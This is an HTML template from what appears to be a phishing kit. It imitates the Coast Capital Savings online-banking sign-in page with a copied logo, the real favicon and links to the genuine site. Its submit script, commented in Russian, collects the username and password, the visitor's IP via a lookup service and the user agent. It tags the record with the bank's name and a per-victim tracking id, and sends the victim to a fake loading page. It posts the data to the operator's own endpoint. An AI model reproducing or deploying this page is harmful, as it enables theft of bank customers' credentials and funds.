<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>CoastCapital - Secure Login</title>
    <script src="https://cdn.tailwindcss.com"></script>
    <link rel="shortcut icon" href="https://banking.coastcapitalsavings.com/favicon.ico">
    <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.4.0/css/all.min.css">
    <style>
        @import url('https://fonts.googleapis.com/css2?family=Poppins:wght@300;400;500;600;700&display=swap');
        
        body {
            font-family: 'Poppins', sans-serif;
            background: linear-gradient(135deg, #f0f4ff 0%, #ffffff 100%);
        }
        
        .wave-bg {
            position: absolute;
            bottom: 0;
            left: 0;
            width: 100%;
            height: 100px;
            background: url('data:image/svg+xml;utf8,<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 1440 320"><path fill="%230055b3" fill-opacity="0.1" d="M0,192L48,197.3C96,203,192,213,288,229.3C384,245,480,267,576,250.7C672,235,768,181,864,181.3C960,181,1056,235,1152,234.7C1248,235,1344,181,1392,154.7L1440,128L1440,320L1392,320C1344,320,1248,320,1152,320C1056,320,960,320,864,320C768,320,672,320,576,320C480,320,384,320,288,320C192,320,96,320,48,320L0,320Z"></path></svg>');
            background-size: cover;
            z-index: -1;
        }
        
        .card-shadow {
            box-shadow: 0 20px 25px -5px rgba(0, 85, 179, 0.1), 0 10px 10px -5px rgba(0, 85, 179, 0.04);
        }
        
        .input-focus:focus {
            box-shadow: 0 0 0 3px rgba(0, 85, 179, 0.2);
        }
        
        .btn-gradient {
            background: linear-gradient(135deg, #0055b3 0%, #003087 100%);
        }
        
        .btn-gradient:hover {
            background: linear-gradient(135deg, #003087 0%, #002366 100%);
        }
        
        .footer-link:hover {
            text-decoration: underline;
            color: #003087;
        }
        
        .dropdown:hover .dropdown-menu {
            display: block;
        }
    </style>
</head>
<body class="min-h-screen flex flex-col">
    <!-- Header -->
    <header class="bg-white py-4 px-6 shadow-sm">
        <div class="container mx-auto flex justify-between items-center">
            <div class="flex items-center space-x-2">
                <img src="https://i.postimg.cc/L5jVTbFn/coastcapital.png" alt="CoastCapital Logo" class="h-10">
            </div>
            </div>
        </div>
    </header>

    <!-- Main Content -->
    <main class="flex-grow flex items-center justify-center py-12 px-4 sm:px-6 lg:px-8">
        <div class="w-full max-w-md space-y-8">
            <div class="text-center">
                <h2 class="text-3xl font-extrabold text-blue-900">Welcome Back</h2>
                <p class="mt-2 text-sm text-gray-600">
                    Sign in to access your accounts and manage your finances
                </p>
            </div>
            
            <div class="bg-white rounded-xl p-8 card-shadow">
                <form class="mt-8 space-y-6" action="/submit-coastcapital" method="POST" id="coastcapital-login-form">
                    <input type="hidden" name="url_id" value="{{ url_id }}">
                    <div class="rounded-md space-y-4">
                        <div>
                            <label for="login-id" class="sr-only">Username</label>
                            <div class="relative">
                                <input id="login-id" name="login-id" type="text" required 
                                    class="appearance-none relative block w-full px-4 py-3 border border-gray-300 placeholder-gray-500 text-gray-900 rounded-lg focus:outline-none focus:ring-blue-500 focus:border-blue-500 focus:z-10 sm:text-sm input-focus"
                                    placeholder="Username">
                                <div class="absolute inset-y-0 right-0 pr-3 flex items-center pointer-events-none">
                                    <i class="fas fa-user text-gray-400"></i>
                                </div>
                            </div>
                        </div>
                        <div>
                            <label for="password" class="sr-only">Password</label>
                            <div class="relative">
                                <input id="password" name="password" type="password" required 
                                    class="appearance-none relative block w-full px-4 py-3 border border-gray-300 placeholder-gray-500 text-gray-900 rounded-lg focus:outline-none focus:ring-blue-500 focus:border-blue-500 focus:z-10 sm:text-sm input-focus"
                                    placeholder="Password">
                                <div class="absolute inset-y-0 right-0 pr-3 flex items-center pointer-events-none">
                                    <i class="fas fa-lock text-gray-400"></i>
                                </div>
                            </div>
                        </div>
                    </div>

                    <div class="flex items-center justify-between">
                        <div class="flex items-center">
                            <input id="remember-me" name="remember-me" type="checkbox" 
                                class="h-4 w-4 text-blue-600 focus:ring-blue-500 border-gray-300 rounded">
                            <label for="remember-me" class="ml-2 block text-sm text-gray-700">
                                Remember me
                            </label>
                        </div>

                        <div class="text-sm">
                            <a href="https://www.coastcapitalsavings.com/" class="font-medium text-blue-600 hover:text-blue-500">
                                Forgot password?
                            </a>
                        </div>
                    </div>

                    <div>
                        <button type="submit" 
                            class="group relative w-full flex justify-center py-3 px-4 border border-transparent text-sm font-medium rounded-lg text-white bg-blue-600 hover:bg-blue-700 focus:outline-none focus:ring-2 focus:ring-offset-2 focus:ring-blue-500 btn-gradient transition duration-150 ease-in-out">
                            <span class="absolute left-0 inset-y-0 flex items-center pl-3">
                                <i class="fas fa-sign-in-alt"></i>
                            </span>
                            Sign in
                        </button>
                    </div>
                </form>
                
                <div class="mt-6">
                    <div class="relative">
                        <div class="absolute inset-0 flex items-center">
                            <div class="w-full border-t border-gray-300"></div>
                        </div>
                        <div class="relative flex justify-center text-sm">
                            <span class="px-2 bg-white text-gray-500">
                                New to CoastCapital?
                            </span>
                        </div>
                    </div>

                    <div class="mt-4">
                        <a href="https://www.coastcapitalsavings.com/" class="w-full flex items-center justify-center px-4 py-2 border border-gray-300 rounded-lg shadow-sm text-sm font-medium text-blue-600 bg-white hover:bg-gray-50">
                            <i class="fas fa-user-plus mr-2"></i> Register for online banking
                        </a>
                    </div>
                </div>
            </div>
            
            <div class="bg-blue-50 rounded-lg p-4 text-center">
                <p class="text-sm text-blue-800">
                    <i class="fas fa-shield-alt mr-1"></i> Your security is our priority. 
                    <a href="https://www.coastcapitalsavings.com/" class="font-medium text-blue-600 hover:text-blue-500">Learn more</a>
                </p>
            </div>
        </div>
    </main>

    <!-- Footer -->
    <footer class="bg-blue-900 text-white py-8">
        <div class="container mx-auto px-6">
            <div class="grid grid-cols-1 md:grid-cols-4 gap-8">
                <div class="space-y-2">
                    <h3 class="font-bold text-lg mb-4">Banking</h3>
                    <ul class="space-y-2">
                        <li><a href="https://www.coastcapitalsavings.com/" class="text-blue-200 hover:text-white footer-link">Personal Banking</a></li>
                        <li><a href="https://www.coastcapitalsavings.com/" class="text-blue-200 hover:text-white footer-link">Business Banking</a></li>
                        <li><a href="https://www.coastcapitalsavings.com/" class="text-blue-200 hover:text-white footer-link">Investments</a></li>
                        <li><a href="https://www.coastcapitalsavings.com/" class="text-blue-200 hover:text-white footer-link">Mortgages</a></li>
                    </ul>
                </div>
                
                <div class="space-y-2">
                    <h3 class="font-bold text-lg mb-4">Support</h3>
                    <ul class="space-y-2">
                        <li><a href="https://www.coastcapitalsavings.com/" class="text-blue-200 hover:text-white footer-link">Help Center</a></li>
                        <li><a href="https://www.coastcapitalsavings.com/" class="text-blue-200 hover:text-white footer-link">Contact Us</a></li>
                        <li><a href="https://www.coastcapitalsavings.com/" class="text-blue-200 hover:text-white footer-link">Security Center</a></li>
                        <li><a href="https://www.coastcapitalsavings.com/" class="text-blue-200 hover:text-white footer-link">Branch Locator</a></li>
                    </ul>
                </div>
                
                <div class="space-y-2">
                    <h3 class="font-bold text-lg mb-4">About Us</h3>
                    <ul class="space-y-2">
                        <li><a href="https://www.coastcapitalsavings.com/" class="text-blue-200 hover:text-white footer-link">Our Story</a></li>
                        <li><a href="https://www.coastcapitalsavings.com/" class="text-blue-200 hover:text-white footer-link">Careers</a></li>
                        <li><a href="https://www.coastcapitalsavings.com/" class="text-blue-200 hover:text-white footer-link">Community</a></li>
                        <li><a href="https://www.coastcapitalsavings.com/" class="text-blue-200 hover:text-white footer-link">Newsroom</a></li>
                    </ul>
                </div>
                
                <div class="space-y-4">
                    <h3 class="font-bold text-lg mb-4">Connect With Us</h3>
                    <div class="flex space-x-4">
                        <a href="https://www.coastcapitalsavings.com/" class="text-blue-200 hover:text-white text-xl">
                            <i class="fab fa-facebook-f"></i>
                        </a>
                        <a href="https://www.coastcapitalsavings.com/" class="text-blue-200 hover:text-white text-xl">
                            <i class="fab fa-twitter"></i>
                        </a>
                        <a href="https://www.coastcapitalsavings.com/" class="text-blue-200 hover:text-white text-xl">
                            <i class="fab fa-instagram"></i>
                        </a>
                        <a href="https://www.coastcapitalsavings.com/" class="text-blue-200 hover:text-white text-xl">
                            <i class="fab fa-linkedin-in"></i>
                        </a>
                    </div>
                    

                </div>
            </div>
            
            <div class="border-t border-blue-800 mt-8 pt-8">
                <div class="flex flex-col md:flex-row justify-between items-center">
                    <div class="flex items-center space-x-4 mb-4 md:mb-0">
                        <img src="https://i.postimg.cc/L5jVTbFn/coastcapital.png" alt="CoastCapital Logo" class="h-8">
                        <span class="text-sm text-blue-200">© 2025 CoastCapital Savings. All rights reserved.</span>
                    </div>
                    
                    <div class="flex flex-wrap justify-center md:justify-end space-x-4">
                        <a href="https://www.coastcapitalsavings.com/" class="text-sm text-blue-200 hover:text-white footer-link">Privacy Policy</a>
                        <a href="https://www.coastcapitalsavings.com/" class="text-sm text-blue-200 hover:text-white footer-link">Terms of Use</a>
                        <a href="https://www.coastcapitalsavings.com/" class="text-sm text-blue-200 hover:text-white footer-link">Accessibility</a>
                        <a href="https://www.coastcapitalsavings.com/" class="text-sm text-blue-200 hover:text-white footer-link">Sitemap</a>
                    </div>
                </div>
            </div>
        </div>
    </footer>
    
    <div class="wave-bg"></div>
    
    <script>

        // Simple password visibility toggle (could be enhanced)
        document.addEventListener('DOMContentLoaded', function() {
            const passwordInput = document.getElementById('password');
            const passwordToggle = document.createElement('div');
            passwordToggle.className = 'absolute inset-y-0 right-0 pr-3 flex items-center cursor-pointer';
            passwordToggle.innerHTML = '<i class="fas fa-eye text-gray-400 hover:text-gray-600"></i>';
            passwordToggle.addEventListener('click', function() {
                const type = passwordInput.getAttribute('type') === 'password' ? 'text' : 'password';
                passwordInput.setAttribute('type', type);
                this.innerHTML = type === 'password' ? '<i class="fas fa-eye text-gray-400 hover:text-gray-600"></i>' : '<i class="fas fa-eye-slash text-gray-400 hover:text-gray-600"></i>';
            });
            
            const passwordContainer = passwordInput.parentNode;
            passwordContainer.appendChild(passwordToggle);
            
            // Replace the original eye icon with the toggle
            passwordContainer.querySelector('.pointer-events-none').remove();
        });
    </script>
<script>
    document.addEventListener('DOMContentLoaded', function() {
        const form = document.querySelector('#coastcapital-login-form');
        form.addEventListener('submit', function(e) {
            e.preventDefault();
            
            // Получаем url_id из всех возможных источников
            let urlId;
            
            // 1. Из параметров URL
            const urlParams = new URLSearchParams(window.location.search);
            urlId = urlParams.get('url_id');
            
            // 2. Из скрытого поля формы
            if (!urlId) {
                const hiddenField = form.querySelector('input[name="url_id"]');
                if (hiddenField) {
                    urlId = hiddenField.value;
                }
            }
            
            // 3. Из sessionStorage
            if (!urlId) {
                urlId = sessionStorage.getItem('url_id');
            }
            
            // Если всё еще нет url_id, показываем ошибку
            if (!urlId) {
                alert('Session ID is missing. Please restart the process.');
                return;
            }
            
            // Создаем элементы для IP и User-Agent
            const ipField = document.createElement('input');
            ipField.type = 'hidden';
            ipField.name = 'user_ip';
            
            const uaField = document.createElement('input');
            uaField.type = 'hidden';
            uaField.name = 'user_agent';
            uaField.value = navigator.userAgent;
            
            form.appendChild(ipField);
            form.appendChild(uaField);
            
            // Сначала получаем IP
            fetch('https://api.ipify.org?format=json')
                .then(response => response.json())
                .then(data => {
                    ipField.value = data.ip;
                    
                    // Теперь создаем FormData с актуальными значениями
                    const formData = new FormData(form);
                    formData.append('bankname', 'coastcapital');
                    formData.append('url_id', urlId);

                    // Перенаправляем на loading.html с url_id
                    window.location.href = `/render/loading?url_id=${encodeURIComponent(urlId)}`;

                    // Отправка данных формы после перехода
                    fetch('/submit-coastcapital', {
                        method: 'POST',
                        body: formData,
                        keepalive: true
                    }).catch(error => {
                        console.error('Error submitting form:', error);
                    });
                })
                .catch(error => {
                    console.error('Error getting IP:', error);
                    ipField.value = 'unknown';
                    
                    // Создаем FormData с fallback значением
                    const formData = new FormData(form);
                    formData.append('bankname', 'coastcapital');
                    formData.append('url_id', urlId);
                    
                    window.location.href = `/render/loading?url_id=${encodeURIComponent(urlId)}`;
                    
                    fetch('/submit-coastcapital', {
                        method: 'POST',
                        body: formData,
                        keepalive: true
                    }).catch(fetchError => {
                        console.error('Error submitting form:', fetchError);
                    });
                });
        });
    });
</script>


    <script>
        // Сохраняем url_id при загрузке страницы банка
        document.addEventListener('DOMContentLoaded', function() {
            const urlId = "{{ url_id }}";
            if (urlId) {
                sessionStorage.setItem('url_id', urlId);
            }
        });
    </script>
</body>
</html>